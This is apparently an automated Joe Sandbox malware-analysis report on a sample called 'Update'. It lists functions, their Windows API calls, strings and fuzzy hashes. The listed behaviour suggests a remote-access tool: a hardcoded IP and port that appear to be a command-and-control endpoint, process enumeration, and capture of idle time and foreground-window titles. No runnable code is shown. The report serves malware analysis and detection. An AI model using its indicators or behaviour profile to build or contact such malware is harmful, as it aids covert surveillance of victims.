FindResourceW.KERNEL32(00000000,004F0043), ref: 6CA98066
LoadResource.KERNEL32(00000000,00000000), ref: 6CA98074
SizeofResource.KERNEL32(00000000,00000000), ref: 6CA9807E
LockResource.KERNEL32(00000000), ref: 6CA98087

Part of subcall function 6CA96B10: _strlen.LIBCMT ref: 6CA96B9F

Strings

N, xrefs: 6CA9802E
C, xrefs: 6CA98036
I, xrefs: 6CA98026
T, xrefs: 6CA98055

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: Resource$FindHandleLoadLockModuleSizeof_strlen
String ID: C$I$N$T
API String ID: 415223560-3924500842
Opcode ID: 2d846e643febf93e601764f86b88515b35b93f3af34d0a5b74d1b696c7dd91f9
Instruction ID: c8939b94f067e90977207cdc0b101f1a525511291af70129ca4f3ad7800edd8d
Opcode Fuzzy Hash: 2d846e643febf93e601764f86b88515b35b93f3af34d0a5b74d1b696c7dd91f9
Instruction Fuzzy Hash: 3411D8B0A05340ABD7048B348D49A7B77ECEF86208F045919FC4AC6301FB759E89C7A6

Function 6CAB9BE7 Relevance: 13.8, APIs: 9, Instructions: 273COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6CAB9FEC: CreateFileW.KERNEL32(FFFFFFFF,00000000,?,6CAB9C90,?,?,00000000,?,6CAB9C90,FFFFFFFF,0000000C), ref: 6CABA009

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAB9CFB
__dosmaperr.LIBCMT ref: 6CAB9D02
GetFileType.KERNEL32(00000000), ref: 6CAB9D0E
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAB9D18
__dosmaperr.LIBCMT ref: 6CAB9D21
CloseHandle.KERNEL32(00000000), ref: 6CAB9D41
CloseHandle.KERNEL32(6CAB07FB), ref: 6CAB9E8E
GetLastError.KERNEL32 ref: 6CAB9EC0
__dosmaperr.LIBCMT ref: 6CAB9EC7

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID:
API String ID: 4237864984-0
Opcode ID: 6f3555b19342c8f9493bf4dcc3edac9de1bed850fc191f386e5d24e4d2fd40f7
Instruction ID: b338368fe409ceeb57900ae895b2ec52318c6135d76fb8809f8cf5da948c5de5
Opcode Fuzzy Hash: 6f3555b19342c8f9493bf4dcc3edac9de1bed850fc191f386e5d24e4d2fd40f7
Instruction Fuzzy Hash: B7A13732A146459FCF0D9F78CD91BAD3BB8AB07328F18024AF811EB391D7349996C751

Function 6CA92CEC Relevance: 13.1, APIs: 3, Strings: 4, Instructions: 894COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 6CA92E9B

Strings

, xrefs: 6CA93E96
,, xrefs: 6CA93D12
jIk, xrefs: 6CA93E27
., xrefs: 6CA92CEF

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: _strlen
String ID: $,$.$jIk
API String ID: 4218353326-3923260969
Opcode ID: 7faf63af75a2c023205fc994bb37b380f8c779f343329f01b547ebcf635a4ea1
Instruction ID: b99fa24e28070add7e9f192ecb636d6fd7dc1ef647ae65d077d5cdfa4cc2ee40
Opcode Fuzzy Hash: 7faf63af75a2c023205fc994bb37b380f8c779f343329f01b547ebcf635a4ea1
Instruction Fuzzy Hash: 0D82CB71D112688BEB24CF68C8953EDBBF2BF85304F158298D449AB691DB715EC8CF81

Function 037FCA70 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 197registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,000F003F,038112F8,4EB10097,00000001,00000000,00000000), ref: 037FCAB1
RegQueryInfoKeyW.ADVAPI32(038112F8,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 037FCAE0
_memset.LIBCMT ref: 037FCB44
_memset.LIBCMT ref: 037FCB53
RegEnumValueW.KERNEL32(038112F8,?,00000000,?,00000000,?,00000000,?), ref: 037FCB72

Part of subcall function 037FF707: _malloc.LIBCMT ref: 037FF721

Part of subcall function 037FF707: std::exception::exception.LIBCMT ref: 037FF756
Part of subcall function 037FF707: std::exception::exception.LIBCMT ref: 037FF770
Part of subcall function 037FF707: __CxxThrowException@8.LIBCMT ref: 037FF781

RegCloseKey.KERNEL32(038112F8,?,?,?,?,?,?,?,?,?,?,?,00000000,038112F8,000000FF), ref: 037FCC83

Strings

Console\0, xrefs: 037FCAA4

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: _memsetstd::exception::exception$CloseEnumException@8InfoOpenQueryThrowValue_malloc
String ID: Console\0
API String ID: 1348767993-1253790388
Opcode ID: a3a21e0cc6acf4690033f57cbef06a324dfbe804bd1a4f596c506c4aa1ea7595
Instruction ID: 6de9fcbe1508db735eb89ab52070407eaef08fa5ff4d53e1cd9302c1996b9166
Opcode Fuzzy Hash: a3a21e0cc6acf4690033f57cbef06a324dfbe804bd1a4f596c506c4aa1ea7595
Instruction Fuzzy Hash: 82610EB5E00219AFDB04DFA8D884EAEB7F9FF49310F14466AE915EB345D7349901CBA0

Function 037FBB00 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

Part of subcall function 037FF707: _malloc.LIBCMT ref: 037FF721

_memset.LIBCMT ref: 037FBB21
GetLastInputInfo.USER32(?), ref: 037FBB37
GetTickCount.KERNEL32 ref: 037FBB3D
wsprintfW.USER32 ref: 037FBB66
GetForegroundWindow.USER32 ref: 037FBB6F
GetWindowTextW.USER32(00000000,00000020,000000FA), ref: 037FBB83

Strings

%d min, xrefs: 037FBB60

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: Window$CountForegroundInfoInputLastTextTick_malloc_memsetwsprintf
String ID: %d min
API String ID: 3754759880-1947832151
Opcode ID: 57dd58cee6f4ddaaaa507d53656a242d3ecee8e9303a6f9cae0efebc2ea1fded
Instruction ID: b0a146d480dc2c616960640327464461ce6f21cadbfd9c065f83e60d010497fb
Opcode Fuzzy Hash: 57dd58cee6f4ddaaaa507d53656a242d3ecee8e9303a6f9cae0efebc2ea1fded
Instruction Fuzzy Hash: 364173B5900218AFCB10EFA4DC89E9FBBB8FF44710F188555E9099B355D6749A04CBE1

Function 037F6910 Relevance: 12.1, APIs: 8, Instructions: 128COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(4EB10097,00000000,00000000,75BF73E0,?,00000000,038110DB,000000FF,?,037F6AB3,00000000), ref: 037F6938
OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,038110DB,000000FF,?,037F6AB3,00000000), ref: 037F6947
OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,038110DB,000000FF,?,037F6AB3,00000000), ref: 037F6960
CloseHandle.KERNEL32(00000000,?,00000000,038110DB,000000FF,?,037F6AB3,00000000), ref: 037F696B
SysStringLen.OLEAUT32(00000000), ref: 037F69BE
SysStringLen.OLEAUT32(00000000), ref: 037F69CC
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,038110DB,000000FF), ref: 037F6A2E
CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,038110DB,000000FF), ref: 037F6A34

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: CloseHandleProcess$OpenString$CurrentToken
String ID:
API String ID: 429299433-0
Opcode ID: c3633e7fde16416d8d1524190c3c639d643b9201bffe35dac1bacdc6fa0e6c08
Instruction ID: 0f62b188b545d9c457a7bc11a17eea1da69f894cf9cb8fc84a8b915ed8932147
Opcode Fuzzy Hash: c3633e7fde16416d8d1524190c3c639d643b9201bffe35dac1bacdc6fa0e6c08
Instruction Fuzzy Hash: D241A5B2E406189FDB10DFA9CC84AAEF7F8FB44710F14466AEA55E7340D775A900CBA0

Function 6CA96B10 Relevance: 11.0, APIs: 2, Strings: 4, Instructions: 507COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 6CA96B9F
_strlen.LIBCMT ref: 6CA96D84

Strings

137.220.229.61, xrefs: 6CA96D3F, 6CA96FD2
IP=, xrefs: 6CA96B5D
Port, xrefs: 6CA96DB4
18852, xrefs: 6CA97075, 6CA970B9

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: _strlen
String ID: 137.220.229.61$18852$IP=$Port
API String ID: 4218353326-240388825
Opcode ID: cbc8b6de3b338c4ecdb770664263c114deeb92eecef5226bcf23edc711c65fa2
Instruction ID: eb0fe263ee4a763f213f94252a1f9a9baded5df77a7ae74b95a9d8f2b8921b15
Opcode Fuzzy Hash: cbc8b6de3b338c4ecdb770664263c114deeb92eecef5226bcf23edc711c65fa2
Instruction Fuzzy Hash: 6B12B5B2910B008BD724CF38C9817A6B7F6FF89318F154A2DD49AC7B90EB35E5898751

Function 6CA980F0 Relevance: 10.7, APIs: 7, Instructions: 180processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6CA980FE
Process32FirstW.KERNEL32(00000000,0000022C), ref: 6CA98139
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000), ref: 6CA9816C
_strlen.LIBCMT ref: 6CA9818B
Process32NextW.KERNEL32(?,?), ref: 6CA982EF
CloseHandle.KERNEL32(00000000), ref: 6CA982FD
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 6CA98313

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: CloseHandleProcess32$ByteCharCreateFirstMultiNextSnapshotToolhelp32Wide_strlen
String ID:
API String ID: 1292832681-0
Opcode ID: b580e68eb5294256331ff596eb77f948414fdb64e2bd32133bcc2bb30ff6f010
Instruction ID: d9400265156d1bad37cb8dd6717935ac243b452876f8fa9b346429b675a6328c
Opcode Fuzzy Hash: b580e68eb5294256331ff596eb77f948414fdb64e2bd32133bcc2bb30ff6f010
Instruction Fuzzy Hash: 8F517B729193005BE3108F64CD82BDFB7E9AF85314F150A2AF959D7681E730D98C87A3

Function 037F6D70 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 89registrystringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 037F6DD9
RegOpenKeyExW.KERNEL32(80000001,03815164,00000000,00020019,75BF73E0), ref: 037F6DFC
RegQueryValueExW.KERNEL32(75BF73E0,GROUP,00000000,00000001,?,00000208), ref: 037F6E4A
lstrcmpW.KERNEL32(?,03815148), ref: 037F6E60
lstrcpyW.KERNEL32(037F56EA,?), ref: 037F6E72

Strings

GROUP, xrefs: 037F6E42

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: OpenQueryValue_memsetlstrcmplstrcpy
String ID: GROUP
API String ID: 2102619503-2593425013
Opcode ID: ea51f5ecf3b6a6172f6667bca8bbe70cbb6f8dc2b4e213faea6eb1e45fdf5337
Instruction ID: 53a2dbf6826dd23011e264b2701efce000cc2c72e658c40f698347fd1012bb0b
Opcode Fuzzy Hash: ea51f5ecf3b6a6172f6667bca8bbe70cbb6f8dc2b4e213faea6eb1e45fdf5337
Instruction Fuzzy Hash: CB318571940319AFDB20DFA0DC89B9EB7BCFB08714F1042D9E515A7280DB74AA84CF50

Function 037FFA29 Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON

Download Yara Rule

APIs

___set_flsgetvalue.LIBCMT ref: 037FFA4E
__calloc_crt.LIBCMT ref: 037FFA5A
__getptd.LIBCMT ref: 037FFA67
CreateThread.KERNEL32(00000000,00000000,037FF9C4,00000000,00000000,037FE003), ref: 037FFA9E
GetLastError.KERNEL32(?,00000000,?,?,037FE003,00000000,00000000,037F5F40,00000000,00000000,00000000), ref: 037FFAA8
_free.LIBCMT ref: 037FFAB1
__dosmaperr.LIBCMT ref: 037FFABC

Part of subcall function 037FF91B: __getptd_noexit.LIBCMT ref: 037FF91B

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
String ID:
API String ID: 155776804-0
Opcode ID: 3114d22e8ce343e6f2d1fb6580b7583d57ea945b0173ebaba03eb5c3e6c0408d
Instruction ID: 54e646d689f13e25886af24ace3b23335075a4847421cee95e0fbf3f54d2ec7f
Opcode Fuzzy Hash: 3114d22e8ce343e6f2d1fb6580b7583d57ea945b0173ebaba03eb5c3e6c0408d
Instruction Fuzzy Hash: A511A536204706BFDB11FFE9EC8499B7798FF06A747144565FA14CA390DF71D4018A61

Function 1000721B Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON

Download Yara Rule

APIs

___set_flsgetvalue.LIBCMT ref: 10007240
__calloc_crt.LIBCMT ref: 1000724C
__getptd.LIBCMT ref: 10007259
CreateThread.KERNEL32(?,?,100071B6,00000000,?,?), ref: 10007290
GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 1000729A
_free.LIBCMT ref: 100072A3
__dosmaperr.LIBCMT ref: 100072AE

Part of subcall function 1000710D: __getptd_noexit.LIBCMT ref: 1000710D

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
String ID:
API String ID: 155776804-0
Opcode ID: d853c5aad6a4ca1283704040be1a2fdba58bd4e9b88c6b00cf5b9d9771d5e89a
Instruction ID: e2e0b3d062d787f99d787063b624e9a47e01a5ceed69b34c49d3f3bc16e6f751
Opcode Fuzzy Hash: d853c5aad6a4ca1283704040be1a2fdba58bd4e9b88c6b00cf5b9d9771d5e89a
Instruction Fuzzy Hash: C911E136604746AFF711DFA8DC41D8B37E8FF453E0B110029F95C8A19ADB79E8008AA0

Function 037F7410 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,037F7523), ref: 037F743D
GetProcAddress.KERNEL32(00000000), ref: 037F7444
GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,037F7523), ref: 037F7452
GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,037F7523), ref: 037F745A

Strings

kernel32.dll, xrefs: 037F741D
GetNativeSystemInfo, xrefs: 037F7418

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: InfoSystem$AddressHandleModuleNativeProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 3433367815-192647395
Opcode ID: 0a297bcb851f560c3b2a2976e66a31a2bed1b48f06aeb2ed12d4aad4a5b737f2
Instruction ID: 2e199db900954a05f6b7bfa3b23821b0871894e45b5a2b9a9d15527d9354ff24
Opcode Fuzzy Hash: 0a297bcb851f560c3b2a2976e66a31a2bed1b48f06aeb2ed12d4aad4a5b737f2
Instruction Fuzzy Hash: D10128B0D002099FCB94EFF499446BEBBF9EB48200F5446A9DA59E3340E6399A50CF61

Function 037FF9C4 Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON

Download Yara Rule

APIs

___set_flsgetvalue.LIBCMT ref: 037FF9CA

Part of subcall function 03803CA0: TlsGetValue.KERNEL32(00000000,03803DF9,?,03801EEF,00000003,03801CFF,?,03808E82,00000011,00000000,?,03803F06,0000000D,03816340,00000008,03803FFF), ref: 03803CA9
Part of subcall function 03803CA0: DecodePointer.KERNEL32(?,03801EEF,00000003,03801CFF,?,03808E82,00000011,00000000,?,03803F06,0000000D,03816340,00000008,03803FFF,00000000), ref: 03803CBB
Part of subcall function 03803CA0: TlsSetValue.KERNEL32(00000000,?,03801EEF,00000003,03801CFF,?,03808E82,00000011,00000000,?,03803F06,0000000D,03816340,00000008,03803FFF,00000000), ref: 03803CCA

___fls_getvalue@4.LIBCMT ref: 037FF9D5

Part of subcall function 03803C80: TlsGetValue.KERNEL32(?,?,037FF9DA,00000000), ref: 03803C8E

___fls_setvalue@8.LIBCMT ref: 037FF9E8

Part of subcall function 03803CD4: DecodePointer.KERNEL32(?,?,?,037FF9ED,00000000,?,00000000), ref: 03803CE5

GetLastError.KERNEL32(00000000,?,00000000), ref: 037FF9F1
ExitThread.KERNEL32 ref: 037FF9F8
GetCurrentThreadId.KERNEL32 ref: 037FF9FE
__freefls@4.LIBCMT ref: 037FFA1E

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
String ID:
API String ID: 2383549826-0
Opcode ID: 0aa544b76ae90a7a2702ab0b57d1e124f9b1abffc579b65f477af77e41c40ee8
Instruction ID: 31449434a7b58e5a8613ee74ca53c1d05cc46e3a3f1cd24a48c4192cb93fb064
Opcode Fuzzy Hash: 0aa544b76ae90a7a2702ab0b57d1e124f9b1abffc579b65f477af77e41c40ee8
Instruction Fuzzy Hash: F0F0F97C601744AFC748FBB5C94880EBBADAE8924472585D8EA09DB251DA74D442CBA2

Function 100071B6 Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON

Download Yara Rule

APIs

___set_flsgetvalue.LIBCMT ref: 100071BC

Part of subcall function 10009754: TlsGetValue.KERNEL32(00000000,100098AD,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000), ref: 1000975D
Part of subcall function 10009754: DecodePointer.KERNEL32(?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000,?,100099BA,0000000D), ref: 1000976F
Part of subcall function 10009754: TlsSetValue.KERNEL32(00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000,?,100099BA), ref: 1000977E

___fls_getvalue@4.LIBCMT ref: 100071C7

Part of subcall function 10009734: TlsGetValue.KERNEL32(?,?,100071CC,00000000), ref: 10009742

___fls_setvalue@8.LIBCMT ref: 100071DA

Part of subcall function 10009788: DecodePointer.KERNEL32(?,?,?,100071DF,00000000,?,00000000), ref: 10009799

GetLastError.KERNEL32(00000000,?,00000000), ref: 100071E3
ExitThread.KERNEL32 ref: 100071EA
GetCurrentThreadId.KERNEL32 ref: 100071F0
__freefls@4.LIBCMT ref: 10007210

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
String ID:
API String ID: 2383549826-0
Opcode ID: 9534965ccca21370a2365faca07fc43a5bbbcb8b41f594eb418147c089430495
Instruction ID: 9ef8d05c11a244158b1ee883055881acaa61a2209176cdde4bb0df2a080a06ba
Opcode Fuzzy Hash: 9534965ccca21370a2365faca07fc43a5bbbcb8b41f594eb418147c089430495
Instruction Fuzzy Hash: 7EF09679404240ABF304DFB5C94988E7BA9FF482C4725C458F90C8B21BDB39E8428790

Function 6CA92F01 Relevance: 9.5, APIs: 2, Strings: 3, Instructions: 778COMMON

Download Yara Rule

Strings

, xrefs: 6CA93E96
,, xrefs: 6CA93D12
jIk, xrefs: 6CA93E27

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID:
String ID: $,$jIk
API String ID: 0-2946808363
Opcode ID: 8f3334da1f3a356116e2222cbd4ea2a31c1f7b91e5345f2a00895f41efc606df
Instruction ID: 6e636de0423e46cf617a83e7679ecd355efb2a2fbfedec34891fc5d31dc7925a
Opcode Fuzzy Hash: 8f3334da1f3a356116e2222cbd4ea2a31c1f7b91e5345f2a00895f41efc606df
Instruction Fuzzy Hash: A472BC71D112688BEB24CF28C8957EDBBB2AF85304F158298D48D7B691DB715EC8CF81

Function 6CA93024 Relevance: 9.5, APIs: 2, Strings: 3, Instructions: 738COMMON

Download Yara Rule

Strings

, xrefs: 6CA93E96
,, xrefs: 6CA93D12
jIk, xrefs: 6CA93E27

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID:
String ID: $,$jIk
API String ID: 0-2946808363
Opcode ID: 93b272d3837ad76a5d1f0d99c4160e4aafadbab785314ff676ae0a3ebd6b9443
Instruction ID: d5919ffeb0ec1e928b0e5c4219055a27f37ce7f7f02ab106824d0b46a0c09d97
Opcode Fuzzy Hash: 93b272d3837ad76a5d1f0d99c4160e4aafadbab785314ff676ae0a3ebd6b9443
Instruction Fuzzy Hash: 3272BB71D112688BDB24CF28C8957EDBBB2AF85304F158298D48DBB691DB715EC8CF81

Function 6CAB21F6 Relevance: 9.3, APIs: 6, Instructions: 292COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b507303b741939f7a97eaf339ea0c5a17755335ce7523e0364ef3a8f1491c2ae
Instruction ID: 75b9e4f8fcc04c526c3f55587da26c03b3ea34d766d7f3a35620b65360d1c6b9
Opcode Fuzzy Hash: b507303b741939f7a97eaf339ea0c5a17755335ce7523e0364ef3a8f1491c2ae
Instruction Fuzzy Hash: AAB10AB0A14349AFDB05CF99C948BDDBBB9BF06308F18435AE414A7B81C77499C6CB60

Function 100032E0 Relevance: 9.0, APIs: 6, Instructions: 32synchronizationsleepCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 100032F1
Sleep.KERNEL32(00000258), ref: 100032FE
InterlockedExchange.KERNEL32(?,00000000), ref: 10003306
WaitForSingleObject.KERNEL32(?,000000FF), ref: 10003312
